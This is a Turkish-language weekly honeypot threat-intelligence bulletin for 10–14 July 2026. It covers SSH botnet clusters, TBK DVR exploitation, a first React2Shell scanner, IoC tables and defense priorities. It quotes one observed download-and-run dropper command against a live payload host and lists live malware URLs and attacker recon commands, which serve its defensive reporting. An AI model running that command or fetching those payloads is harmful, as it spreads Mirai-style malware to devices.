Bülten 10–14 Temmuz: React2Shell Tarayıcısı Feed'e Girdi, SSH Playbook'u Banatsync Üçlüsüne Taşındı, Kısa Ama Sert Dalga
Haftalık pencerede feed'e 1.397 yeni IoC girdi ve 11 Temmuz'da tek günde 783K event ile geçen haftanın sakinliği kısa sürdü. 2025 tarihli React Server Components açığı (CVE-2025-55182) ilk kez tarama listelerimizde göründü, SSH persistence playbook'u senkron bir Banatsync üçlüsüne taşındı ve SOSTREA/TBK istismarı yavaşladı ama path marker'ı sabit kaldı. Geçen bültenin öngörüleri yine test edildi.
Analiz: Erdem Özyurt · SiberKale Tellal
İçindekiler 12
- Yönetici Özeti
- 1. Kısa Ama Sert Dalga: Sakinlik 11 Temmuz’da Bozuldu
- 2. TR Hosting Dalgası REXE ve HostLAB’a Kaydı
- 3. SSH Playbook’u Banatsync Üçlüsüne Taşındı
- 4. SOSTREA Yavaşladı Ama Marker Sabit, Cephanelik Genişledi
- 5. React2Shell: 2025 CVE’si İlk Kez Radarda
- 6. SMTP, MySQL ve Genel Yüzey
- 7. Feed Göstergeleri
- IoC Tablosu: 10 – 14 Temmuz Penceresi
- Savunma Öncelikleri
- Sonuç
- Metodoloji ve Lisans
Yönetici Özeti
3–9 Temmuz bülteni “aylardır en sakin hafta” notuyla kapanmış, aktörlerin altyapıyı haftalık ritimde eskittiğini ama davranış imzalarının sabit kaldığını söylemişti. Bu kısa pencere iki tarafı da doğruladı: sakinlik 11 Temmuz’da tek günlük bir dalgayla bozuldu, ama arkadaki komut zincirleri ve marker’lar aynen yerinde kaldı. Dönemin dört hikâyesi:
- Kısa ama sert dalga: Günlük ham hacim geçen haftanın ~254K taban çizgisinden 11 Temmuz’da 783K event’e sıçradı (pencerenin %54’ü tek güne sığdı), sonra 12–13 Temmuz’da ~80–107K’ya geri düştü. Dalga geldi, hedef listesini çıkardı, çekildi.
- React2Shell radara girdi: 2025 tarihli React Server Components açığı (CVE-2025-55182) feed’imizde ilk kez göründü. Tek kaynak
45.198.224.244, 12 Temmuz’da iki saniyeye sığan bir patlamayla 8080 portunu yokladı. Sayı küçük ama sinyal yeni: en güncel web-framework açıkları artık tarama sepetinde. - SSH playbook’u Banatsync üçlüsüne taşındı: Geçen haftanın senkron ikilisinden
45.153.34.235sustu; yerini141.11.88.238/.240/.251(Banatsync Srl) üçlüsü aldı, üçü birden ~10,7–11,1K Cowrie event ile neredeyse eşit yük üretti. Komut zinciri ve credential parmak izi Nisan’dan beri değişmedi. - SOSTREA yavaşladı, marker sabit: TBK DVR istismarı (CVE-2024-3721) geçen haftanın 2.087 imzasından 854’e indi, ama
___S_O_S_T_R_E_A_MAX___marker’ı vebbcdropper’ı aynı yerde. Bu kez rotasyon durdu; teslimat cephaneliğinenzmulti-arch ve cacti temalı payload eklendi.
Bu bülten 10–14 Temmuz penceresini kapsar; ağırlık 10–13 Temmuz tam günlerindedir (14 Temmuz sensör retention'ında henüz tamamlanmamıştı, sayımlara dahil edilmedi). Pencerenin tamamı hem IoC veritabanı hem ham sensör retention'ı içinde kaldığı için trend ve davranış verisi tek katmandır. İç/yönetim trafiği, honeypot overlay'ının kendi iç iletişimi ve bilinen operasyonel kaynaklar tüm tablo ve listelerden çıkarılmıştır.
1. Kısa Ama Sert Dalga: Sakinlik 11 Temmuz’da Bozuldu
Pencere toplamı 1,45M event ve 23.615 benzersiz kaynak IP (4 gün). Geçen bültenin 7 günlük penceresi ~254K/gün ortalamayla “en sakin hafta” olmuştu; bu kısa pencerede 11 Temmuz tek başına 783K event üretti ve o sakinliği bir günde geri aldı. Sonra dalga çekildi:
| Gün | Event | Yeni IoC |
|---|---|---|
| 10 Temmuz | 475.780 | 453 |
| 11 Temmuz | 782.676 | 554 |
| 12 Temmuz | 81.271 | 195 |
| 13 Temmuz | 107.300 | 195 |
Profil klasik “keşif dalgası”: 10–11 Temmuz’da geniş yüzeyli tarama, hedef listesi çıkarma, ardından hızlı geri çekilme. 12–13 Temmuz taban çizgisine dönüş, ama bu iki gün de daha nokta atışı istismar (TBK DVR, React2Shell) barındırdı. Yani hafta iki fazlıydı: önce hacim, sonra hassas dokunuş.
Yeni IoC’lerin ülke dağılımında Türkiye yine ilk sırada ve bu kez farkı açtı:
| Ülke | Yeni IoC (10–13 Tem) |
|---|---|
| TR | 638 |
| US | 174 |
| CN | 110 |
| GB | 93 |
| BE | 85 |
| NL | 46 |
TR’nin 638 yeni IoC’si toplam haftalık girişin %46’sı. Ama bu, saldırıların Türkiye’den yönetildiği anlamına gelmiyor: bu IP’ler Türk bulut sağlayıcılarında kiralanmış tarama node’ları. Kaynak ASN dağılımı bunu netleştiriyor.
2. TR Hosting Dalgası REXE ve HostLAB’a Kaydı
Geçen bülten, TR trafiğinin tek bir ASN’de (AS214041 Dokunmatik Ekran) yoğunlaştığını “izlenmesi gereken yeni desen” olarak not etmişti. Bu hafta tablo yeniden çok-operatörlü hâle döndü, ama ağırlık merkezi iki Türk hosting’e kaydı:
| AS Holder | Yeni IoC |
|---|---|
| REXE Teknoloji A.Ş. | 254 |
| HostLAB Bilişim Teknolojileri A.Ş. | 213 |
| Google LLC (GCP) | 105 |
| KuzeyDC Mailbox Internet | 70 |
| DigitalOcean | 64 |
| Rackdog LLC | 51 |
REXE ve HostLAB tek başına TR yeni IoC’lerinin üçte ikisini üretti. Dokunmatik Ekran ASN’i sahneden çekilmedi ama liderliği bıraktı: ham sensör tarafında o bloktan 213.146.165.46 hâlâ dönemin en yoğun ikinci kaynağıydı (13.476 event, 443/80 web taraması). Türk hosting ekosistemi kötüye kullanım açısından “tek yoğun ASN” fazından geri çıkıp yeniden dağıldı; savunma tarafında bu, tek ASN blok yerine düzenli güncellenen bir TR-hosting prefix listesi gerektiriyor.
3. SSH Playbook’u Banatsync Üçlüsüne Taşındı
Geçen bültenin senkron SSH ikilisi (45.153.34.235 + 91.92.40.14) bu hafta ayrıştı: 45.153.34.235 tamamen sustu (0 event), 91.92.40.14 yalnızca 10 Temmuz’da tek günlük bir yığınla (10.941 event) göründü. Playbook’u devralan ise yeni bir senkron küme oldu:
| IP | Cowrie event | Not |
|---|---|---|
141.11.88.238 | 11.094 | Banatsync Srl (US), port 22 |
141.11.88.240 | 10.711 | Aynı /24, senkron yük |
141.11.88.251 | 10.649 | Aynı /24, senkron yük |
45.153.34.71 | 10.633 | TechTies Inc. (NL), komşu operasyon |
45.153.34.186 | 10.625 | Aynı /24, senkron yük |
Üç Banatsync IP’sinin event sayılarının 10,6–11,1K bandında kümelenmesi (ve TechTies çiftinin de aynı banda oturması) tesadüf değil: aynı görev tanımının aynı anda beş instance’a dağıtıldığı senkron küme deseni, geçen haftanın ikili yapısının genişlemiş hâli. Ayrıca lider tek kaynak 172.86.122.53 (US, RouterHosting) tek başına 14.508 event ile SSH gövdesinin başını çekti.
Login sonrası komut zinciri Nisan’dan beri kelimesi kelimesine aynı; tüm komutlar 199–203 hit bandında, yani tek scriptin fingerprint sekansı:
| Komut / davranış | Hit |
|---|---|
cd ~; chattr -ia .ssh; lockr -ia .ssh | 201 |
uname -a / uname -m | 200–203 |
cat /proc/cpuinfo ... (kapasite keşfi) | 200–201 |
crontab -l | 200 |
free -m, df -h, top, w, which ls | 199–200 |
Credential tarafında klasikler başta (root 5.634, admin 1.099; parolada 123456, 123, password), ama asıl imza yine botnet parmak izi çifti:
| Credential | Hit | Tür |
|---|---|---|
345gs5662d34 | 179 | kullanıcı adı + parola (aynı değer iki alanda) |
3245gs5662d34 | 177 | parola varyantı |
Bu çift tek başına yüksek doğruluklu bir IOC; geçen bültende işaret ettiğimiz gibi hâlâ aktif. SSH client sürümlerinde ise insan yok: Go %52,8 ve libssh %40,2 birlikte trafiğin %93’ü, PuTTY yalnızca %1,4. Tümü otomasyon.
4. SOSTREA Yavaşladı Ama Marker Sabit, Cephanelik Genişledi
TBK DVR ailesinin istismarı bu hafta hız kesti: ET WEB_SPECIFIC_APPS TBK DVR-4104/4216 Command Injection (CVE-2024-3721) imzası geçen haftanın 2.087’sinden 854 tetiklenmeye indi, ağırlık 12 Temmuz’da. İki aktör imzanın tamamını taşıyor:
| IP | CVE-2024-3721 hit | Bağlam |
|---|---|---|
45.153.34.204 | 492 | Nisan’dan beri aktif, hem tarayıcı hem bbc payload sunucusu |
45.139.122.80 | 345 | Geçen haftanın ana aktörü, süreklilik |
Değişmeyen ise operasyonun kalbi: ___S_O_S_T_R_E_A_MAX___ marker’ı Tanner’da 848 kez, hep aynı device.rsp injection deseniyle görüldü. 45.153.34.204’ten gelen payload zinciri birebir aynı kaldı:
cd /tmp; rm bbc; wget http://95.182.89.105/bbc; chmod 777 bbc; ./bbc
Geçen hafta “host rotasyonu artık haftalık” demiştik; bu hafta 95.182.89.105 bbc hostu yerinde durdu, yani rotasyon bir tur atladı. Buna karşılık teslimat cephaneliği genişledi: Cowrie’de yakalanan indirmeler yeni iki dağıtım hattı gösterdi:
| Payload | İndirme | Bağlam |
|---|---|---|
41.216.189.92/nz/nz.{x86,mips,arc,i468} + nz.sh | 11 | Multi-arch Mirai binary seti (mimari başına ayrı) |
103.56.149.224/cacti/ns{1,3}.jpg | 9 | .jpg uzantılı gizlenmiş payload (SHA 80c3fe2a…) |
Multi-arch nz seti, farklı CPU mimarilerindeki IoT cihazlarını körlemesine hedefleyen klasik Mirai dağıtım yöntemi; cacti temalı .jpg payload ise web tarafında masum görsel gibi görünüp indir-çalıştır zincirine giren bir gizleme denemesi. IP listeleri haftalık eskiyor, ama tespit noktası sabit: marker, device.rsp deseni ve /tmp içindeki indir-çalıştır zinciri.
5. React2Shell: 2025 CVE’si İlk Kez Radarda
Haftanın en yeni sinyali küçük ama önemli. ET WEB_SPECIFIC_APPS React Server Components React2Shell Unsafe Flight Protocol Property Access (CVE-2025-55182) imzası feed geçmişimizde ilk kez tetiklendi: tek kaynak 45.198.224.244 (VPSVAULT.HOST, US), 12 Temmuz 12:01’de iki saniyeye sığan 25 istekle 8080 portunu taradı.
CVE-2025-55182, Next.js/React Server Actions katmanındaki güvensiz deserialization üzerinden uzaktan kod çalıştırmaya açılan taze bir zincir (React2Shell). Yani en son çıkan web-framework açıkları, yayımlanmalarından kısa süre sonra kitlesel tarama sepetlerine giriyor.
Bu tarama honeypot'un IDS katmanına takıldı; emülatör Server Action içeriğini tam karşılamadığı için exploit payload'ının sonraki adımları görülmedi. Yine de kayıt net: 2025 tarihli bir framework açığı feed'e girdi. İnternete açık her Next.js uygulaması Next.js ≥ 15.2.5 / 14.x son yama seviyesinde olmalı; Server Actions endpoint'lerine (/api, _next/server) gelen Next-Action başlıklı POST istekleri ve multipart/form-data gövdeleri WAF/log tarafında izlenmeli. Aynı gün ThinkPHP RCE (20) ve PHP-CGI CVE-2024-4577 (20) imzaları da tetiklendi; eski ve yeni açıklar aynı tarama demetinde birlikte geliyor.
6. SMTP, MySQL ve Genel Yüzey
SMTP’de yeni dominant. Mailoney tarafında 2.791 event’in yarısına yakınını yeni bir kaynak taşıdı: 130.12.182.166 (1.356 event, %48,6) geçen bültende yoktu. Geçen haftanın işaret ettiğimiz 158.94.x bloğu ise tahmin edildiği gibi dönmeye devam etti: 158.94.211.49 594 event ile ikinci sırada, 158.94.211.32 de listede. IP değişiyor, komşuluk kalıyor.
MySQL/Dionaea sabit envanterci. 213.209.159.154 (TW, Feo Prest) 10.279 event ile 3306 portunda dört gün boyunca düzenli kaldı, 12 Temmuz’da 5.049 event’lik günlük yoğunlaşma yaptı. Geçen bültenin “sabırlı ve düzenli envanter taraması” profili aynen sürüyor.
Dış yüzey port dağılımı bu hafta web ağırlıklı bir dengeye oturdu:
| Port | Event | Bağlam |
|---|---|---|
| 443 | 444.432 | HTTPS probe |
| 80 | 441.052 | HTTP probe |
| 22 | 434.569 | SSH |
| 3306 | 16.253 | MySQL |
| 8080 | 15.524 | Alternatif web (geçen hafta liderdi, geriledi) |
| 25 | 8.750 | SMTP |
Diğer yüzey notları:
- MikroTik API taraması bu hafta gelmedi: Geçen bülten 8728/tcp’ye haftalık ~25,8K probe raporlamıştı ve izlemeye almıştık. Bu pencerede 8728 ve 7844’e dışarıdan sıfır trafik geldi; her iki porttaki kayıtlar tamamen honeypot overlay’ının kendi iç iletişimi (OPSEC-filtreli çıkarıldı). Öngörü bu hafta gerçekleşmedi; portu kapalı tutma önerisi yine de geçerli.
- KEYPLUG/Conficker imzası yine iç kaynak: Severity-1 imzalarının büyük kısmını oluşturan
KEYPLUG/Downadup/Conficker-C P2Pailesi bu dönemde de honeypot overlay ağının kendi iç trafiğinden doğan yanlış pozitif çıktı; dış saldırgan sinyali değil, public sayımlardan çıkarıldı. Dışarıdan gelen gerçek severity-1’lerSuspicious Chmod(857) ve TBK DVR (854) etrafında toplanıyor. 2.57.121.0/24yeni SSH kümesi: Romanya UNMANAGED bloğundan2.57.121.25(1.519) ve2.57.121.112(1.210) dört gün boyunca dengeli SSH taraması yaptı. Geçen haftanın Romanya ikilisi (193.32.162.34/35) susmuştu; aynı ülkeden farklı bir blok ritmi devraldı.
7. Feed Göstergeleri
| Metrik | 10 Temmuz | 14 Temmuz | Değişim |
|---|---|---|---|
| Toplam IoC | 62.211 | 63.608 | +1.397 (%2,2) |
| Pencere IoC (10–13 Tem) | — | 1.397 | — |
| Benzersiz ASN | 4.015 | 4.047 | +32 |
Tüm zamanlar ülke sıralaması geçen haftanın tablosunu korudu; Çin üçüncülüğünü sağlamlaştırdı:
| Ülke | IoC (14 Temmuz) | Not |
|---|---|---|
| US | 13.332 | Lider |
| TR | 9.479 | 2. (değişmedi) |
| CN | 5.468 | 3. (BR’nin önünde kaldı) |
| BR | 5.251 | 4. |
IoC Tablosu: 10 – 14 Temmuz Penceresi
| IoC | Tür | Bağlam | Öncelik |
|---|---|---|---|
45.198.224.244 | IP | React2Shell CVE-2025-55182 tarayıcısı (feed’de ilk) | high |
45.153.34.204 | IP | TBK DVR CVE-2024-3721 + bbc payload sunucusu, Nisan’dan beri aktif | high |
45.139.122.80 | IP | SOSTREA/TBK ikinci aktörü, süreklilik | high |
95.182.89.105/bbc | URL | SOSTREA bbc dropper hostu (rotasyon bu hafta durdu) | high |
41.216.189.92/nz/nz.x86 | URL | Multi-arch Mirai payload seti | high |
103.56.149.224/cacti/ns3.jpg | URL | .jpg gizlenmiş payload (SHA 80c3fe2a…) | medium |
141.11.88.238 / .240 / .251 | IP | Banatsync senkron SSH kümesi (playbook yeni taşıyıcısı) | high |
45.153.34.71 / .186 | IP | TechTies senkron SSH kümesi (komşu operasyon) | high |
172.86.122.53 | IP | Dönemin lider SSH kaynağı (14,5K event) | medium |
213.146.165.46 | IP | TR web tarama zirvesi (Dokunmatik Ekran ASN) | medium |
2.57.121.25 / 2.57.121.112 | IP | Romanya UNMANAGED yeni SSH kümesi | medium |
213.209.159.154 | IP | MySQL/Dionaea sabit envanter taraması | medium |
130.12.182.166 | IP | SMTP/Mailoney yeni dominant kaynak | medium |
158.94.211.49 | IP | SMTP bloğunun dönüşü (158.94.208.0/22) | medium |
345gs5662d34 / 3245gs5662d34 | Credential | SSH botnet parmak izi (kullanıcı + parola) | medium |
80c3fe2ae1062abf56456f52518bd670f9ec3917b7f85e152b347ac6b6faf880 | SHA-256 | cacti temalı .jpg payload | medium |
ET WEB_SPECIFIC_APPS React Server Components React2Shell (CVE-2025-55182) | IDS | Taze framework açığı taraması | high |
ET WEB_SPECIFIC_APPS TBK DVR-4104/4216 Command Injection (CVE-2024-3721) | IDS | SOSTREA aktif istismarı | high |
IOC’lar savunma amaçlı paylaşılır. Haftanın dersi geçen haftayı tekrarlıyor: kaynak IP’ler değişiyor (senkron ikili → Banatsync üçlüsü, SMTP → yeni dominant, Romanya bloğu → yeni blok), davranış ve marker’lar değişmiyor.
Savunma Öncelikleri
- Taze framework açıkları (yeni): CVE-2025-55182 feed’e girdi. İnternete açık Next.js uygulamalarını ≥ 15.2.5 / 14.x son yamaya çekin; Server Actions endpoint’lerine gelen
Next-Actionbaşlıklı POST’ları ve olağandışımultipart/form-datagövdelerini alarma bağlayın. Yeni CVE’ler artık haftalar içinde toplu taranıyor, yama penceresi kısa. - SSH post-auth korelasyonu (sahibi değişti): Başarılı login sonrası ilk 60 saniyede
chattr/lockr .ssh,crontab,uname,cpuinfozinciri en güvenilir imza.345gs5662d34/3245gs5662d34credential çiftini doğrudan IOC olarak ekleyin. - Prefix bazlı flood savunması: Senkron küme deseni bu hafta Banatsync
141.11.88.0/24ve TechTies45.153.34.0/24üzerine yayıldı; Romanya2.57.121.0/24de aynı ritimde. Rate-limit ve skorlamayı IP değil en az /24 prefix bazında uygulayın. - TBK DVR / IoT yüzeyi: İstismar yavaşladı ama durmadı. Tespiti
device.rspinjection deseni ve___S_O_S_T_R_E_A_MAX___marker’ı üzerinden kurun; payload host listeleri (95.182.89.105,41.216.189.92,103.56.149.224) haftalık eskiyor, egress’te/tmpindir-çalıştır zincirini izleyin. - SMTP komşuluk izleme:
158.94.208.0/22yine döndü, yanına yeni dominant130.12.182.166eklendi.RCPT TObaşarısızlıklarını tekil IP yerine prefix bazında gruplamaya devam edin.
Sonuç
Bu kısa pencere, geçen bültenin ana tezini bir kez daha kanıtladı: aktörler altyapıyı hızla eskitiyor, davranışı hiç değiştirmiyor. Senkron SSH kümesi üçüncü kez el değiştirdi (Romanya ikilisi → TechTies ikilisi → Banatsync üçlüsü), SMTP yeni bir dominant kaynağa geçti, SOSTREA cephaneliğine iki yeni dağıtım hattı ekledi. Ama komut zinciri, marker, credential çifti ve senkron-küme deseni aylardır sabit.
Yeni olan tek şey React2Shell: 2025 tarihli bir açığın feed’e girmesi, savunmanın “eski CVE’ler + yeni CVE’ler aynı tarama demetinde” gerçeğiyle yüzleşmesi gerektiğini gösteriyor. IP listesi tabanlı savunmanın yarı ömrü haftayla ölçülürken, davranış imzalarına ve hızlı yama disiplinine yapılan yatırım değerini koruyor.
Metodoloji ve Lisans
Bu rapor 10 – 14 Temmuz 2026 arası Tellal IoC veritabanı kayıtları ile aynı dönemin ham honeypot loglarının OPSEC-filtreli analiziyle hazırlandı. Dahili IP’ler, yönetim trafiği, honeypot overlay’ının iç iletişimi, RFC1918/CGNAT ve bilinen operasyonel kaynaklar public yayından çıkarılmıştır. Pencerenin tamamı sensör retention’ı içinde kaldığı için trend ve davranış verisi tek katmandır.
Bu bültenlerin dayandığı honeypot ağının ne olduğunu, nasıl kurulduğunu ve ne yakaladığını merak ediyorsanız: Honeypot (Bal Küpü) Nedir? Türleri, Kurulumu ve Sahadan Gerçek Veriler.
Lisans: CC BY 4.0 · Atıf yapılarak serbestçe kullanılabilir. IOC’lar CC0 lisansı altında serbesttir. SiberKale Tellal · Threat Intelligence Feed · tellal.net